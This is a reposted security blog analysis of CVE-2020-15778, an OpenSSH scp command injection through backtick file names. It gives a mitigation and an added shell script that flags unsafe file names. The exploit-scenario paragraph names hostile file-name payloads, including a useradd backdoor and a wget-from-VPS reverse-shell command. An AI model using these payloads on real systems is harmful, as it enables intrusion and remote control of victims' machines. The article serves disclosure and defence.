
CVE-2020-15778 SSH vulnerability reproduction analysis

2022-05-15 07:51:53 Irteam - Industrial Safety

Many industrial routers and some controllers use OpenSSH for external connections and management. On 9 July 2020 the foreign security researcher Chinmay Pandya found a command injection vulnerability in the scp command of OpenSSH 8.3p1 and earlier.

In the scp.c code at https://github.com/openssh/openssh-portable/blob/master/scp.c, line 989 is where the vulnerability is triggered. When copying files to a remote server, the file path is appended to the end of the locally built scp command. For example, if you execute the following command:

scp user@RemoteIP:directory/TargetFile

it will execute the local command:

scp -t directory/TargetFile

When the local scp command is constructed, the file name is not sanitized. An attacker can inject a command by using backquotes (`) in a file name, and Linux accepts backquotes (`) in file names. If the payload is placed between backquotes as the file name, the command is executed when scp is invoked.

Exploit scenarios:

An attacker can disguise a USB drive as device firmware or some kind of tool, create a deep subdirectory on the drive, and give a file in that directory a backquoted name such as `reboot`. When the victim copies the drive's directories and files with `scp -r \Folder RemoteIP:\Folder`, the victim's machine reboots. Similarly, a file name combining backquotes with useradd can open a backdoor on the victim's machine directly. The nastier red-team variant, of course, is to host a reverse-shell script on FTP on a VPS and use backquotes around `wget http://vps:port/xxx.sh | sh ./xxx.sh` as the file name, which makes the victim's machine send a reverse shell to the VPS.

For remote command execution you still need to bypass authorized_keys, so the remote side is less likely to be usable. The PoC video below only shows that remote command execution is possible; the premise is that authorized_keys is bypassed, otherwise you still need to know the password.

Video demo: http://mpvideo.qpic.cn/0bf2pyaggaaabeahhgjgcrpva7wdmn7aayya.f10002.mp4?

Protection solutions

As of now the OpenSSH GitHub repository has not fixed this vulnerability. Stop using `scp -r` to copy whole directories; instead compress the directory into a single file with tar, upload that file to the remote machine with scp, and then extract the directory on the remote machine over ssh.
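The workaround above, with a file-name check placed in front of it, as an added shell example that is not part of the original article or of OpenSSH. `find_unsafe_names` lists every path under a directory whose name contains a backtick, `$(`, `;`, `|` or `&`, the characters an unpatched scp would hand to a shell unescaped, so an operator can see such names before copying; `safe_copy_dir` carries out the article's tar, scp, ssh-extract sequence, in which only the operator-chosen archive name ever appears on a command line. The remote `user@RemoteIP`, the directory `/tmp/upload`, the variable `REAL_RUN` and the constructed demo tree are assumptions; by default the scp and ssh steps are printed rather than executed.

```shell
#!/bin/sh
# Added example, not code from the original article or from OpenSSH.
#  - find_unsafe_names: print paths whose names carry shell metacharacters
#    that an scp affected by CVE-2020-15778 would pass to a shell unescaped.
#  - safe_copy_dir: the article's mitigation; tar the tree into one archive
#    whose name the operator chooses, copy that single file, extract over ssh.
# REMOTE, REMOTE_DIR and REAL_RUN are assumed names for this example.

# Print each path under $1 whose basename contains a backtick, "$(", ";", "|" or "&".
find_unsafe_names() {
    find "$1" \( -name '*`*' -o -name '*$(*' -o -name '*;*' \
                -o -name '*|*' -o -name '*&*' \) -print
}

# Number of such paths, as a plain integer string (no padding).
count_unsafe_names() {
    find_unsafe_names "$1" | wc -l | tr -d ' '
}

# Archive directory $1 into the tar file $2, then copy that single file with
# scp and extract it on the remote with ssh. Unsafe names are reported but do
# not block the copy: inside the archive they are data, not command text.
# scp/ssh are only printed unless REAL_RUN is set to a non-empty value.
safe_copy_dir() {
    src=$1; archive=$2
    remote=${REMOTE:-user@RemoteIP}        # assumed placeholder host
    remote_dir=${REMOTE_DIR:-/tmp/upload}  # assumed remote directory
    run=echo                               # dry run by default
    if [ -n "${REAL_RUN:-}" ]; then run=; fi

    n=$(count_unsafe_names "$src")
    if [ "$n" != "0" ]; then
        echo "warning: $n file name(s) with shell metacharacters under $src:" >&2
        find_unsafe_names "$src" >&2
    fi

    # tar stores arbitrary names as archive entries; no shell sees them here.
    tar -C "$src" -cf "$archive" .
    # Only the operator-chosen archive name reaches the scp/ssh command line.
    $run scp "$archive" "$remote:$remote_dir/"
    $run ssh "$remote" "tar -C '$remote_dir' -xf '$remote_dir/$(basename "$archive")'"
}

# Demonstration on a constructed tree: one innocuous file and one file in a
# deep subdirectory whose name is a backtick-wrapped command.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/src/deep/sub"
touch "$demo_dir/src/readme.txt" "$demo_dir/src/deep/sub/"'`reboot`'
echo "unsafe names found: $(count_unsafe_names "$demo_dir/src")"   # 1
safe_copy_dir "$demo_dir/src" "$demo_dir/upload.tar"
rm -rf "$demo_dir"
```

The check is a lint, not a fix: the tar step is what keeps attacker-controlled names off the shell command line, and the check only makes sure the operator notices that a copied tree contained such names. Run with `REAL_RUN=1 REMOTE=... REMOTE_DIR=...` to execute the scp and ssh steps instead of printing them.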

Reference: https://github.com/cpandya2909/CVE-2020-15778

Copyright notice
Author: Irteam - Industrial Safety. Please include the original link when reprinting, thank you.
https://en.chowdera.com/2022/131/202205102047500324.html